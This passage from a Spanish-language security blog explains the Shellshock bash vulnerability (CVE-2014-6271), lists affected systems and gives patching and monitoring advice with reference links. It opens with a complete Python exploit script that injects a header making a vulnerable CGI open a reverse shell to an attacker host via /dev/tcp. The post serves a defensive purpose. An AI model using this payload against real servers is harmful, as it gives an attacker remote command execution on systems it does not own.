Por otro lado, si tienes un sistema vulnerable con un script CGI, es trival para explotar y obtener una shell inversa con el código como este:

1|  #
2|  #CVE-2014-6271 cgi-bin reverse shell
3|  #
4|
5|  import httplib,urllib,sys
6|
7|  if (len(sys.argv)<4):
8|      print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
9|      print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
10|    exit(0)
11|
12| conn = httplib.HTTPConnection(sys.argv[1])
13| reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]
14|
15| headers = {"Content-type": "application/x-www-form-urlencoded",
16| "test":reverse_shell }
17| conn.request("GET",sys.argv[2],headers=headers)
18| res = conn.getresponse()
19| print res.status, res.reason
20| data = res.read()
21| print data


Otras implicaciones conocidas hasta ahora, que seguro que aumentan estos días, son:
[cito textualmente de SBD]:
  • Uso en ForceCommand de SSH para limitar capacidades de ejecución de comandos
  • Otros CGI (como php, perl, etc) que lancen subshells con llamadas del tipo system()
  • Clientes DHCP que lancen shells.
  • Herramientas y aplicaciones con SUID que invoquen bash para alguna acción.
  • Sistemas móviles que utilicen bash, como Android
  • Otros sistemas con Linux, como routers (que generalmente lanzan pings, traceroutes, etc), modems, televisores, etc..

Otro de los troyanos bautizados como ELF_BASHLITE, ELF Linux/Bash0day o Shellshock o Bashroot ha sido analizado por TrendMicro. VER.


- ¿Cómo parchear Bash en OSX en la estela de "Shellshock"?. IR.
- ¿Cómo parchear tu OS X vulnerable al último problema de bash (para usuarios avanzados), IR.

Las soluciones por el momento están "en pañales", hay que estar pendiente de las principales páginas de nuestros sistemas y equipos, (sistemas operativos *NIX, rooters, etc...) y esperar a a que den solución al problema. Se recomienda actualizar todos los sistemas operativos y firmware, e instalar las actualizaciones de seguridad. Utilice las herramientas de detección de Shellshock o plug-ins para escanear posibles vulnerabilidades y exploits. Para los administradores de sistemas, parchear sus sistemas de inmediato y vigilar de cerca la actividad en la red.


Más Info:

Wikipedia:

-  Bash, IR.
-  Shellshock, IR.

Blogs/Webs:

-  Trend Micro, IR.
-  SecurityByDefault, IR.
-  National Vulnerability Database, CVE-2014-6271 y CVE-2014-7169.
-  Hispasec, IR.
-  Darknet, IR.
-  (...).